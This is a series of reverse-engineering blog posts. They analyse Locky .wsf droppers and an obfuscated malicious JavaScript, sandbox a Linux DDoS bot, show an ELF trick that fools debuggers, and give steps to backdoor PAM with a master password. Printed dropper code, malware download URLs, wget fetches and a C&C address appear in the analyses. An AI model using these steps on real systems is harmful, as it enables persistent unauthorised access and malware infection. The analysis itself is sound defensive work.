mardi 20 septembre 2016

Break On Call and Break On Ret under gdb

1/ Adding BOC and BOR for gdb

As a reverse engineer, I like really gdb. It has a lot of cool features and is scriptable through python.

While I was solving a crackme challenge I needed a break on call and a break on ret instructions. I search the web and did not find what I wanted.

So, I developped a boc (break on call) and a bor (break on ret) function and sharing it today.

2/ How it works?

You just have to source a python file and you end up with three commands:
  • boc : activate break on call with boc on or boc off. You can choose by breaking or printing on call by boc break or boc print
  • bor : same commands for break on ret
  • go : if you have selected boc on and/or bor on, typing go will executing the binary until next call or next ret
 $ gdb -nx -q  
 (gdb) source bocbor.py   
 (gdb) boc  
 Status of Break on Call is off/break  
   Change with boc on/off and boc break/print  
 (gdb) bor  
 Status of Break on Ret is off/break  
   Change with bor on/off and bor break/print  
 (gdb) boc on  
 (gdb) boc  
 Status of Break on Call is on/break  
   Change with boc on/off and boc break/print  
 (gdb)  

3/ Please, just show me the code! 

It's on github
https://github.com/0xmitsurugi/gdbscripts
The Readme shows a typical bocbor session.

4/ Enjoy

Feedback, bugs: mail or twitter

mardi 30 août 2016

Don't always trust your debugger blindly : What You See Is not What You Get!

0/ Intro


A debugger or debugging tool is a computer program that is used to test and debug other programs (the "target" program) (source wikipedia). We can cite IDA or gdb as well known debuggers used in security community.

A debugger is also the security analyst best friend :-) it will help him (or her) to understand what the program is doing. But what if somebody craft an executable file which will show different behaviors between the debugger and the real life?


Let's do that under linux with an ELF binary. ELF is an executable format, supported by IDA and gdb. The format of ELF files is well-known. ELF contains headers, Program Headers and Section Headers.

Program headers are read by kernel when the ELF binary is launched, Section headers are read by debuggers. Theorically, they are the same. Theorically, they said.

Let's start with a very simple Hello World program:
 #include <stdlib.h>  
 const char hello[]="Hello World\n\x00\x03\x00\x00\x00\x01\x00\x02";  
 const char hell[]="Bad, bad World\n";  
 int main(void) {  
      puts(hello);  
      exit(0);  
 }  

Don't pay attention for the garbage at the end of hello[] and the presence of hell[] for now. No need to be an expert to understand what will be printed.

1/ Taking a look Section headers


Let's look at .rodata section, containing the strings, and the relevant asm part in .text:

 mitsurugi@dojo:~/chall/magick$ readelf -x .rodata hello  
 Hex dump of section '.rodata':  
  0x080484e8 03000000 01000200 48656c6c 6f20576f ........Hello Wo  
  0x080484f8 726c640a 00030000 00010002 00426164 rld..........Bad  
  0x08048508 2c206261 6420576f 726c640a 00       , bad World..  
 mitsurugi@dojo:~/chall/magick$ readelf -S hello  
 There are 30 section headers, starting at offset 0xf20:  
 Section Headers:  
  [Nr] Name       Type      Addr   Off  Size  ES Flg Lk Inf Al  
  [ 0]          NULL      00000000 000000 000000 00   0  0 0  0 4  
 (...)  
  [15] .rodata      PROGBITS    080484e8 0004e8 00002e 00  A 0  0 4  
 (...)  
 mitsurugi@dojo:~/chall/magick$  

And the asm:
 0804842b <main>:  
  804842b:     8d 4c 24 04          lea  0x4(%esp),%ecx  
  804842f:     83 e4 f0             and  $0xfffffff0,%esp  
  8048432:     ff 71 fc             pushl -0x4(%ecx)  
  8048435:     55                   push  %ebp  
  8048436:     89 e5                mov  %esp,%ebp  
  8048438:     51                   push  %ecx  
  8048439:     83 ec 04             sub  $0x4,%esp  
  804843c:     83 ec 0c             sub  $0xc,%esp  
  804843f:     68 f0 84 04 08       push  $0x80484f0  
  8048444:     e8 a7 fe ff ff       call  80482f0 <puts@plt>  
  8048449:     83 c4 10             add  $0x10,%esp  
  804844c:     83 ec 0c             sub  $0xc,%esp  
  804844f:     6a 00                push  $0x0  
  8048451:     e8 ba fe ff ff       call  8048310 <exit@plt>  

puts will print the string located in 0x080484f0, located in .rodata section, which is "Hello World\n\x00<unprinted garbage>"

The Section headers says that you put 0x2e bytes from the offset 0x4e8 at the adress 0x080484e8

Let's change this slightly. Only in section headers, let says that the .rodata sections copy 0x18 bytes from the offset 0x4fd at 0x080484e8.


2/ Who are you, and what are you doing to my Section headers?


We now have a second file, called hello-patched. This file still runs good:
 mitsurugi@dojo:~/chall/magick$ ./hello-patched   
 Hello World  
 mitsurugi@dojo:~/chall/magick$  

The relevant part of Section headers are now:
 mitsurugi@dojo:~/chall/magick$ readelf -S hello-patched   
 There are 30 section headers, starting at offset 0xf20:  
 Section Headers:  
  [Nr] Name       Type      Addr   Off  Size  ES Flg Lk Inf Al  
 (...)  
  [15] .rodata      PROGBITS    080484e8 0004fd 000018 00  A 0  0 4  

2/1/ IDA gets tricked


Here is the printscreen of IDA disassembling this file:


Well, this can be confusing when you know that ./hello writes "Hello World"

So, what you see with IDA is not what you get (I've tested the Free edition of IDA v5.0 and IDA Pro 6.7)

2/2/ gdb is even more confusing

Ths string is not the same between x/s and puts call :)

 mitsurugi@dojo:~/chall/magick$ gdb -nx -q hello-patched  
 Reading symbols from hello...(no debugging symbols found)...done.  
 (gdb) disass main  
 Dump of assembler code for function main:  
   0x0804842b <+0>:     lea  0x4(%esp),%ecx  
   0x0804842f <+4>:     and  $0xfffffff0,%esp  
   0x08048432 <+7>:     pushl -0x4(%ecx)  
   0x08048435 <+10>:     push  %ebp  
   0x08048436 <+11>:     mov  %esp,%ebp  
   0x08048438 <+13>:     push  %ecx  
   0x08048439 <+14>:     sub  $0x4,%esp  
   0x0804843c <+17>:     sub  $0xc,%esp  
   0x0804843f <+20>:     push  $0x80484f0  
   0x08048444 <+25>:     call  0x80482f0 <puts@plt>  
   0x08048449 <+30>:     add  $0x10,%esp  
   0x0804844c <+33>:     sub  $0xc,%esp  
   0x0804844f <+36>:     push  $0x0  
   0x08048451 <+38>:     call  0x8048310 <exit@plt>  
 End of assembler dump.  
 (gdb) x/s 0x80484f0  
 0x80484f0 <hello>:     "Bad, bad World\n"  
 (gdb) run  
 Starting program: /home/mitsurugi/chall/magick/hello-patched   
 Hello World  
 [Inferior 1 (process 5382) exited normally]  
 (gdb)  

Ok, that's not really really true: As soon as you run the program, the Section is corrected, and x/s works as expected, but the demo is worth it. Said differently: if you don't run the binary under gdb, you'll get all wrong.



3/ Conclusion


Now think at a crackme, or malware using this technique. Static Analysts will get lost, without even noticing it :-)

Well, nothing new here: if the same information can be picked from two different places, you can be sure there will be problems.
The fact that Section headers can be changed is known since a very long time, I've just wanted to play a bit with it and manipulate ELF format. The idea of this blogpost has born in my mind after filling a bug I've had with radare2.
You can read another blogpost here with some mitigations in bonus.

If you want to try it with your debugger, you can download a copy of the patched hello file here:
http://42.meup.org/e8AyyDp6/hello (sha256 = f63edf2de7d4edeb02650e3821921ddf3831ee33226cece8f81f31b912e464a5 ) and if it works/fail send me the info, I could compile some results :-)

 0xMitsurugi
There are few people who will make mistakes with fire after having once been burned.
~Yamamoto Tsunetomo

vendredi 29 juillet 2016

Update about #Locky xoring data scheme

1/ Intro

This post is a follow-up of this one: http://0x90909090.blogspot.com/2016/07/analyzing-zip-with-wsf-file-inside.html

The malware in question is Locky.

2/ Another Locky

Somebody sends me other Locky's zip files and I quickly figured that the core functionalities are the same
  • a .wsf in a zip file (wsf format slightly changed, so my analyze.py prog in github does not work anymore)
  • some layer of obfuscation
  • all variables are named different, but the structure and functions are the same
  • The downloaded file is XOR-ed with values coming from a PRNG function
  • the PRNG seed has changed

This blogpost will talk about the PRNG.


3/ PRNG

Wikipedia to the rescue:
A pseudorandom number generator (PRNG) is an algorithm for generating a sequence of numbers whose properties approximate the properties of sequences of random numbers. The PRNG-generated sequence is not truly random, because it is completely determined by a relatively small set of initial values, called the PRNG's seed. (...) pseudorandom number generators are important in practice for their speed in number generation and their reproducibility.

And that's it. I think this is a really interesting move because the file downloaded over HTTP looks like random data. Here is the entropy for the file (made with binwalk):


You can compare with the file, once XOR-ed :

This is an interesting way to avoid analysis.
All the network probes only see random data. No particuliar header, no pattern to match.
No static key either (XORed file with static key doesn't see their entropy changing a lot and key can be retrieved).
You can eventually block file downloaded over HTTP when they have no known header and are around 200kB but it's not really precise.

4/ Get the seed


In my previous blogspot, I just copy paste the prng function, with the seed.
If you want to quickly get the seed, you can grep for mash(<data>) in the .wsf file, once extracted from the zip and unobfuscate.


Everything then is the same: generates more than 200k of pseudo random numbers, then XOR the file:
 mitsurugi@dojo:~/chall/infected$ js24 uhe_prng.js > prng_js   
 mitsurugi@dojo:~/chall/infected$ ./unxor.py cj937f7l  
 mitsurugi@dojo:~/chall/infected$ file cj937f7l cj937f7l-xored   
 cj937f7l:    data  
 cj937f7l-xored: PE32 executable (GUI) Intel 80386, for MS Windows  
 mitsurugi@dojo:~/chall/infected$   

5/ Conclusions and questions

I think that everything is not said in the case of Locky. When I read interesting analysis like the one in malwarelabs, I don't understand why they don't ran into the XOR part. No mention about the XOR: they found URL in the wsf file, then they got an .exe file (wut?).
Is there many campaigns, some with exe file other with XOR-ed one? As the URLs mentioned in malwarelabs post are not available anymore, I can't tell :-/

And if you got another samples to share, I'm still willing to take a look :-)


0xMitsurugi
Courage first; power second; technique third.

lundi 18 juillet 2016

Analyzing zip with .wsf file inside

0/ Intro

Between the 13 and 16 of july, I've received of lot of spams, all based
on the same, now classical, pattern. A mail body with wording like:
"How is it going?
Please find attached document you asked for and the latest payments report
Hope that helps. Drop me a line if there is anything else you want to know"

or

"Please find the reference letter I attached."

and a zip file attached containing one file ending in .wsf

 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l 4F6B513_mitsu.zip   
 Archive: 4F6B513_mitsu.zip  
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   29295 2016-07-15 11:09  spreadsheet_87a4..wsf  
 ---------           -------  
   29295           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l mitsu_97027.zip   
 Archive: mitsu_97027.zip  
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   28380 2016-07-15 11:17  spreadsheet_7ff..wsf  
 ---------           -------  
   28380           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ unzip -l mitsu_forward_758093.zip   
 Archive: mitsu_forward_758093.zip  
  Length   Date  Time  Name  
 --------- ---------- -----  ----  
   71060 2016-07-14 11:19  spreadsheet_17f5..wsf  
 ---------           -------  
   71060           1 file  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$  

1/ stage 1 - unzip and get the script

All of the .wsf I saw looks more or less the same:

We have a job declaration, then a very long var (I snipped it for brievety, the line is more than 28000 chars long). This var is just a concatenation of all strings, and in the end, it's reversed.

In order to analyze it, you can copy/paste this var in a python file, and just reverse it:
 #! /usr/bin/python  
 aFusa0arM = ';}\n\r;)('+']fJU (... snipped +28000 chars for brievety ...)
 Fo'+'Tev" = '+'jXO rav'+'\n\r;"" +'+' "eli" '+'= tI ra'+'v\n\r;"" '+'+ "esol'+'c" = 0q'+'O rav';
 print aFusa0arM[::-1]  

2/ stage 2 - unobfuscate the javascript

The javascript file is 700 lines long. A quick glance at it reveals the obfuscation.

2/1/ Obfuscation : use of variables

The code relies heavily of variables.There is a lot of affectation:

 var VYd = "ct" + "";  
 var ZMv = "je" + "";  
 var UJd = "teOb" + "";  
 var AYe0 = "ea" + "";  
 var Co7 = "Cr" + "";  

Then, later on:
 var IUh=WScript[Co7 + AYe0 + UJd + ZMv + VYd]  

2/2/ Obfuscation : use of useless functions - 1

We see also a lot of useless function which produce in output the input given:

 function Xr1(WDv){return WDv;};  
 function Wu6(Jw3){return Jw3;};  

And then, it's use:
 IUh[OEc2 + ZBb4](Yr2[Yc8 + USr + Wu6(En) + Gt2]);  

Still, it's just basic obfuscation

2/3/ Obfuscation : use of useless functions - 2

There is another use of useless function. They are called only once, and produce a fixed output. We can find them from time to time:

 var SWh3=[Ww + NBp4 + (function BEs0(){return Xk6;}()) + IHx1 + QMa + CAi2, JRu9(QVt0) + Ir4 + MIs + XKm + Vo];  


The SWh3 var can be simplified like:

 var SWh3=[Ww + NBp4 + Xk6 + IHx1 + QMa + CAi2, QVt0 + Ir4 + MIs + XKm + Vo];  


2/4/ Unobfuscate

That's not really hard. Load all vars, then replace them in expression, remove all useless functions, and calculate the strings.

3/ part 2 - unobfuscation

Once the vars renamed, we can see the big picture of the file:

3/1/ vars declaration

The file begins with almost 700 lines of var declaration.

But only one line is really interesting:
 var VVq=[Jj+Qo5 + ZKy+(function PGr3(){return STa5;}())+ASs2 +   
 (function ICe1(){return XOl;}())+Aq5+MDs6 + Ty9+GZq + Pe+Pa1 +   
 Mp4+Xr1(Rq8)+(function WXz(){return Xw5;}()),   
 (function Ni8(){return Jj;}())+Eb+Lp0+Zv+Gu+RSq + JXa+Jv+Ne+  
 Wp + Yg+Ov + Kz1+RZl8+BBv + COk+IYz, Qe+Kg7+Em+Uc +   
 (function Ci(){return KKd1;}())+(function PJm6(){return Iq0;}())+  
 FWe(MAp7)+Uq3+Xv1 + Mf + DOo6+Nm(TEz5)+Ex5];  


Which can be read as:
var VVq=[element1, element2, element3]

this declares a table of three elements. After search and replace vars, we can read:
    http://callatisinstitut[.]fr/fytdty8o
    http://www.guapaweb[.]jazztel.es/o54b6
    http://exclusive-closet[.]com/wqcs8fk


3/2/ a PRNG

 function uheprng()  
 function rawprng()  
 function Mash()  
If you google this, you can find that's a random number generator. It will be used later.

3/3/ The juicy part (vars unobfuscated)

 var IUh=WScript[CreateObject](ADODB.Stream);  
 IUh[open]();  
 IUh[type]=2;  
 IUh[write](Yr2[ResponseBody]);  
 IUh[position]=0;  
 IUh[SaveToFile](DJt9, Kn5);  
 IUh[close]();  
 var GHq4=Nh(DJt9); // Ok  
 GHq4=Zy(GHq4);   // This function is important  
 if (GHq4[length] < 100 * 1024 || GHq4[length] > 230 * 1024 || !ZZr(GHq4))  
 {  
   ORj1=1;  
   continue;  
 }  
 try  
 {  
   STn /* H */(Vh9, GHq4);  // it renames the file with .exe  
 }  
 catch (e) {break;};  
 Sn[Run](Vh9 + " 321");   //It runs the exe file with 321 as argument  
 break;  

3/4/ the Zy function

the Zy() function is interesting:
 function Zy(WPx8)  
 {  
   var NKh;  
   var Je = uheprng();  
   for (var KFh4=0; KFh4 < WPx8[length]; KFh4++)  
   {  
     WPx8[KFh4] ^= Je(256);  
   }  
 (other stuff...)  


We can see that it XOR all bytes with the prng initialized to the value 256.

3/5/ The NH() and STn /* H  */() functions

Those functions looks more or less the same. It opens a file, then do byte translations if charCode > 128.
Maybe I'm missing something, but we don't need that to unobfuscate the exe file.

4/ Decrypt exe file

We have the download URLs, a wget is enough to get the file.
The hard part is to generate all the pseudo random numbers. I choose the easy way: Copy paste the PRNG function in a js file, then generate enough pseudo random numbers to use them later:

 function uheprng() {return (function() {  
 var o = 48, c = 1, p = o, s = new Array(o);  
 var i,j;  
 var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";  
 var mash = Mash();  
 for (i = 5806 - 5806; i < o; i++) s[i] = mash(0.598538);  
 mash = null;  
 var random = function( range ) {  
 return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));  
 }  
 function rawprng() {   
 if (++p >= o) p = 0;  
 var t = (482628 * 3 + 320979) * s[p] + c * 2.3283064365386963e-10;  
 return s[p] = t - (c = t | 0);  
 }return random;}());};  
 function Mash() {   
 var n = 0xefc8249d;  
 var mash = function(data) {  
 if ( data ) {  
 data = data.toString();  
 for (var i = 0; i < data.length; i++) {  
 n += data.charCodeAt(i);  
 var h = 0.02519603282416938 * n;  
 n = h >>> 0;  
 h -= n;  
 h *= n;  
 n = h >>> 0;  
 h -= n;  
 n += h * 0x100000000;  
 }  
 return (n >>> (1 * 0)) * 2.3283064365386963e-10;  
 } else n = 0xefc8249d;  
 };  
 return mash;  
 }  
 var Je = uheprng()  
 for (var i=0; i<200000; i++){  
 print(Je(256)); }  
and we can save all those numbers in a file:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ js24 UHE_prng.js > prng_js  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$  

Then a wget and an easy python script will get you the exe file:
 f=open("mal_file","ro")  
 data=f.read()  
 f.close()  
 f=open("prng_js","ro")  
 p=f.readlines()  
 f.close()  
 prng=[]  
 for i in p:  
   prng.append(int(i.strip()))  
 out=[]  
 for i in range(len(data)):  
   o=ord(data[i])^prng[i]  
   out.append(chr(o))  
 out=''.join(out)  
 output=open("data","wb")  
 output.write(out)  
 output.close()  
and we get:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./unxor.py 8f72pw  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ file data  
 data: PE32 executable (GUI) Intel 80386, for MS Windows  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$  

Now, we need somebody brave enough to launch it with 321 as an argument

5/ Automatize all the things

I wrote two python scripts. The first one extracts URLs from the zip file. The second one unxor the file. This is quick&dirty scripts and "It works for me" (tm)

Usage:
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./analyze.py 4F6B513_mitsu.zip  
 Extracting zip  
 [+] Ok zip contains one file ending in .wsf  
 Get obfusctated js  
 [+] Assigning a long var, seems good  
 [+] We have to reverse the string  
 Parsing obfuscated and getting URLs  
 [+] printing download URLs  
   http://mana114[.]takara-bune.net/iqfywp  
   http://sichenia[.]omniadvert.it/7xxsn8  
   http://callatisinstitut[.]fr/fytdty8o  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ wget -q http://mana114[.]takara-bune.net/iqfywp  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ ./unxor.py iqfywp  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$ file data  
 data: PE32 executable (GUI) Intel 80386, for MS Windows  
 mitsurugi@dojo:~/chall/infected/zipped_wsf$


Warning:
  • The python file does an eval() for concatenating all vars. It's considered dangerous. Use at your own risk.
  • Some zip file are not exactly the same and my parser doesn't handle those. The logic behind is the same, but you will have to do analysis by hand. For what I saw, it's the same logic: unxor a file with a PRNG
  • Be aware that those scripts relies on a very small subset of zipfile and relies on a lot of assumptions. 
  • Be aware that I'm using the PRNG with 256 as a fixed value. If its change, the unxor won't work.
  • If you have some sample which doesn't work, I can take a look.

Here is the link to the github repo: https://github.com/0xmitsurugi/Analyzing-zip-file-with-.wsf-file-inside

0xMitsurugi

Our greatest glory is not in never falling, but in rising every time we fall!

You are not judged by the way you fall. 
You are judged by the way you get up after.

lundi 27 juin 2016

Sandboxing a linux malware with gdb

1/ Intro


As I was browsing malwr.com the other day, I noticed some ELF malware. I choose to analyze one.
At first, it was just to learn some things, but in the end, I've finished by writing a full gdb script which was able to monitor safely all communication of this malware.

2/ Discovery

The file in question is a x86_64 ELF, statically linked, not stripped (!), weighting ~ 200kBytes:
mitsurugi@dojo:~/infected$ file Rx64 
Rx64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
mitsurugi@dojo:~/infected$ ls -l Rx64 
-rw-r--r-- 1 mitsurugi mitsurugi 204783 juin  20 17:54 Rx64
mitsurugi@dojo:~/infected$ 

(spoiler off: in the end, I learn that this is DDOSbot/gayfgt family sample)

3/ Reverse

The reversing is not difficult, there is no obfuscation, no anti debug, no persistence. The binary only tries to be stealthy by forking at startup in order to hide its name, and it connects to a C&C, awaiting for commands.

The protocol used is really simple, it's a textual command/response one:
  • regularly, the server sends 'PING', the client replies 'PONG' and vice-versa
  • the server can close the communication
  • the server sets a secret at first use. Any call to the bot without that secret won't be followed by any action. The syntax is "!<secret> <action>"
  • the server can call any shell command
  • the server can call some other functions (flood and scan, basically)
Reverse was done, and an idea appears: why use this malware to connect to its C&C while being monitored?

The logic of the bot can be seen as:

main()
  doing some forks, but only one process remains
  connection to C&C
  A big loop here
    Some code to manage all the forks process if any
    Read data from network
      if PING, send PONG
      if DUP, then exit()
      if starting with !<secret> sh <args> => fork and call shell 
      if starting with !<secret> command args => call function (fork and flood or scan) 

There is nothing really dangerous here. If we just block the shell and flood/scan commands, we end up with a simple client awaiting orders. With this legitimate client, we could connect to the C&C and hear it speak to us. We have to navigate through all the forks, and avoid dangerous commands but with gdb you can put a breakpoint and set $rip elsewhere.

4/ Instrument it

While I was analysing the file, I begun to write a gdb script in order to skip the forks, to print the C&C server, skip all dangerous function. This script became the one I'm showing here.

In the end, every dangerous function is totally neutralized, and I was able to launch it under gdb (and tor) the malware. It connects to the C&C and receive all commands :-)

Here is a live transcript, nothing exciting is showing, just endless PING/PONG reply after a SCANNER OFF (interesting, is the C&C really up?)

root@kali:~# gdb -q Rx64 
Reading symbols from Rx64...(no debugging symbols found)...done.
gdb$ source breakpoints 

###################################
#  Starting instrumented binary
###################################

                             Nothing ventured, nothing gained.
              You can't do anything without risking something.


Breakpoint 1 at 0x406731
Breakpoint 2 at 0x4067d0
Breakpoint 3 at 0x406466
Breakpoint 4 at 0x40689b
Breakpoint 5 at 0x4069df
Breakpoint 6 at 0x406a4d
Breakpoint 7 at 0x406c4d
Breakpoint 8 at 0x406e0b
gdb$ r
Starting program: /root/Rx64 
Breakpoint 1, 0x0000000000406731 in main ()
main() function
Breakpoint 2, 0x00000000004067d0 in main ()
Skipping all the forks
and the setsid
Breakpoint 3, 0x0000000000406466 in initConnection ()
We got currentServer!
0x417120: "208.67.1.114:23"
Continuing...
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
*******************************
* C&C is talking to us:
*0x7fffffffd090: "!* SCANNER OFF\n"
*******************************
/!\ DANGER: COMMAND /!\
C&C sends a command
Will safely ignore it
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
*******************************
* C&C is talking to us:
*0x7fffffffd090: "PING\n"
*******************************
buf: PONG
Breakpoint 4, 0x000000000040689b in main ()
Back to main
Jumping all code related to forks
Breakpoint 5, 0x00000000004069df in main ()
*******************************
* C&C is talking to us:
*0x7fffffffd090: "PING\n"
*******************************
buf: PONG
^C
Program received signal SIGINT, Interrupt.
gdb$

5/ Conclusion

The malware is a well known linux malware, called DDOSbot or gayfgt, there is even some source sample available on internet.

Binary and gdb script are available on github:
https://github.com/0xmitsurugi/SandboxingMalware

0xMitsurugi
Talk is easy, action is difficult.
Action is easy, true understanding is difficult

jeudi 16 juin 2016

Creating a backdoor in PAM in 5 line of code

Under Linux (and other Oses), authentification of users is made through Pluggable Authentication Module, aka PAM. Having centralized authentication is a good thing. But it has a drawback: if you trojanize it, you get key for everything. Trojan once, pwn evrywhere!

1/ Intro

Pam has three concepts: username, password and service. Its role is authenticate people to a service with a password.

Pam configuration is done under /etc/pam.d/ directory where each service has its own file:
 root@dojo:/etc/pam.d# ls  
 atd             common-password        lightdm-greeter       polkit-1      sudo  
 chfn            common-session         login       ppp       systemd-user  
 chpasswd        common-session-noninteractive      runuser   vmtoolsd  
 chsh            cron                   newusers    runuser-l xscreensaver  
 common-account  lightdm                other       sshd  
 common-auth     lightdm-autologin      passwd      su  
 root@dojo:/etc/pam.d#  

Basically, each one of those file calls a shared library, where the authentication or other kind things related to auth is done:
 root@dojo:/etc/pam.d# head login  
 #  
 # The PAM configuration file for the Shadow `login' service  
 #  
 # Enforce a minimal delay in case of failure (in microseconds).  
 # (Replaces the `FAIL_DELAY' setting from login.defs)  
 # Note that other modules may require another minimal delay. (for example,  
 # to disable any delay, you should add the nodelay option to pam_unix)  
 auth    optional  pam_faildelay.so delay=3000000  
 root@dojo:/etc/pam.d#  

And that'st he same kind of config files for all services. As I said, we want to backdoor PAM. We don't want to backdoor everything, we just want to be able to succeed in authentication with a choosen password, independantly of the real password of the user.

Almost all services include the common-auth file, and you can guess what is done here by its name.

2/ Backdooring pam_unix.so in common-auth

The common-auth file has many directives, but the only important line here is the one checking the password of a user:
auth       [success=1 default=ignore]      pam_unix.so nullok_secure  

The common-auth file calls the pam_unix.so shared library and authentication of user is done here. The logic of this file is easy to understand:
  • get username
  • get password
  • calls a subfunction to validate password against username
So, why don't add an if statement?
  • get username
  • get password
  • if password == "0xMitsurugi" then grant access, else calls the legitimate subfunction
Let go to the sources of PAM (depends on your distro, take the same version number as yours..) and look around line numbers 170/180 in the pam_unix_auth.c file:

mitsurugi@dojo:~/chall/PAM/pam_deb/pam-1.1.8$ vi modules/pam_unix/pam_unix_auth.c


Let's change this by:

Recompile the pam_unix_auth.c, end replace the pam_unix.so file:
 mitsurugi@dojo:~/chall/PAM/pam_deb/pam-1.1.8$ make  
  (...)  
 mitsurugi@dojo:~/chall/PAM/pam_deb/pam-1.1.8$ sudo cp \  
  /home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \  
  /lib/x86_64-linux-gnu/security/  
 mitsurugi@dojo:~/chall/PAM/pam_deb/pam-1.1.8$  

3/ Profit !

Try with login, with ssh, with sudo, with su, with the screensaver, your access will be granted with "0xMitsurugi" password. Open access for all accounts \o/

The best part of this is that everything else works as usual. Put your real password, it works. Put a bad one, it fails. Users can change their password, you can audit the strength of the shadow file, you can check for hidden files, you can check for config file modified, open ports, "weird logs", you'll get nothing, but attacker can still get in. Another great advantage of this is that it can remain undetected for a long time.

You can also add logging features in order to catch all password entered, that's an exercise left to the reader.

4/ Enjoy responsibly

Real friends don't backdoor theirs friend's machines.

0xMitsurugi
No one can take Soul Edge from me!

mercredi 15 juin 2016

Analysis of an Evil Javascript

Some days ago, I was invited to check the security of a website.
A customer was complaining of getting alert from its AV while browsing a website, but a visual inspection of the webpage did not reveal anything.

1/ Watch closely

Come back when you're ready! (Denaoshite koi!)

When dealing with infected website, you can start with a simple wget (or curl) and analyze the result. For this time, wget would retrieve an inoffensive HTML file, so the first analysis shows nothing. But if you specify an Internet Explorer User-Agent, you get a different file, way more interesting.
That's a simple and effective trick made by attackers to stay undetected, because infected javascripts are not sent to everybody, only for innocents victims with vulnerable browsers, and not for security analysts. This is usually done with an .htaccess file.

The file I got with a MSIE User-agent looks like this:

 $ wget -U "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US))" http://victim.website.tld/path/to/page.html  
 $ cat page.html  
 <span id="screenXConfirm" style="display:none">0 23 2cs2 czc22 1m3a i12 5b5 1-f2 2b2 3 11 -12
(...4000 chars later on this only line...)
 7 12 2-b2 7k5 74 75 89aban-eqcdcia-jaod-ra.vd.r-esaicmec-a-mco</span>  
 <script>  
 passwordOnkeyup="\x69";switchEval="\x61";newMimeTypes="\x72";pageYOffsetPlugin="\x74"   
 (... 11000 chars later on this only line...)   
 defaultFunction=onkeydownOpener; continueDecodeURIComponent(pkcs11Taint)();layersWith="\x76\x65\x72";pkcs11Taint=layersWith;layersWith+=layersWith  
 </script>  
 <noscript>  
 Error displaying the error page: Application Instantiation Error: Failed to start the session because headers have already been sent by "/jail/var/www/vhosts/victim.website.tld/httpdocs/includes/defines.php" at line 123.  

The script part is interesting. It's filled up with variables, and those names looks like javascript names and functions. After a bit of code beautifying, we can see in the end:
 (...)  
 pkcs11Taint+=setIntervalVolatile;  
 setIntervalVolatile=pageYOffsetFloat;  
 pkcs11Taint+=clearIntervalOnkeyup;  
 clearIntervalOnkeyup=onresetVolatile;  
 pkcs11Taint+=charWindow;  
 charWindow="\x74\x76\x71";  
 pkcs11Taint+=ArrayElements;  
 pkcs11Taint+=staticFloat;  
 pkcs11Taint+=defaultFunction;  
 defaultFunction=onkeydownOpener;  
 continueDecodeURIComponent(pkcs11Taint)();  
 layersWith="\x76\x65\x72";  
 pkcs11Taint=layersWith;  
 layersWith+=layersWith;  
 </script>  

We understand that the pcks11Taint is a string slowly built, variable after variable, which is called like a function thanks to continueDecodeURIComponent(pkcs11Taint)();

Another nice trick is that the pkcs11Taint strings is cleared up right after being called. So, if you try to do some kind of symbolic execution through all the script, you end up with absolutely nothing interesting. You can also see that all the temporary variables are reseted right after evaluation.

2/ Second Layer

You'll be in hell... Before me!

Following this path is really easy. Just change the continueDecodeURIComponent(pkcs11Taint)(); with an alert(); and you'll see this javascript. I beautify it again, and we see:

 a=document.getElementById("screenXConfirm").innerHTML.replace(/[^\d ]/g,"").split(" ");  
 for(i=(+[window.sidebar])+(+[window.chrome]);i<a.length;i++)a[i]=parseInt(a[i])^98;  
 c="constructor";  
 [][c][c](String.fromCharCode.apply(null,a))();  

Remember the <span id=screenXConfirm ...> we saw just before? We remove everything except numbers and space in order to fill a table.
Then, we XOR all value from the table with the value 98 and we finally execute what we got from the table, translated back to characters.

Here is a little python code to see the result (why python? just because.)
1:  #! /usr/bin/python  
2:  import re  
3:  screenXConfirm="0 23 2cs2 czc (...c/c from page.html...) 7 12 2-b2 7k5 74 75 89aban-eqcdcia-jaod-ra.vd.r-esaicmec-a-mco"  
4:    
5:  screenXConfirm=screenXConfirm.split(" ")  
6:  translated_js=[]  
7:  for i in screenXConfirm:  
8:    num=int(re.sub(r"[^\d ]","",i))  
9:    translated_js.append(chr(num^98))  
10:    
11:  print ''.join(translated_js)  
12:    

3/ Third Layer

No mercy!

The python code gives this (once again, the code has been beautified for readability):

 buttonUntaint = (+[window.sidebar]) + (+[window.chrome]);  
 oncontextmenuOnmousedown = ["rv:11", "MSIE", ];  
 for (propertyIsEnumWhile = buttonUntaint; propertyIsEnumWhile < oncontextmenuOnmousedown.length; propertyIsEnumWhile++) {  
   if (navigator.userAgent.indexOf(oncontextmenuOnmousedown[propertyIsEnumWhile]) > buttonUntaint) {  
     undefinedFinally = oncontextmenuOnmousedown.length - propertyIsEnumWhile;  
     break;  
   }  
 }  
 if (navigator.userAgent.indexOf("MSIE 10") > buttonUntaint) {  
   undefinedFinally++;  
 }  
 continueNew = "6pbXWbAoyVTSfe";  
 onloadCheckbox = document.getElementById("screenXConfirm").innerHTML;  
 constEncodeURIComponent = buttonFalse = buttonUntaint;  
 isFiniteDocument = "";  
 onloadCheckbox = onloadCheckbox.replace(/[^a-z]/g, "");  
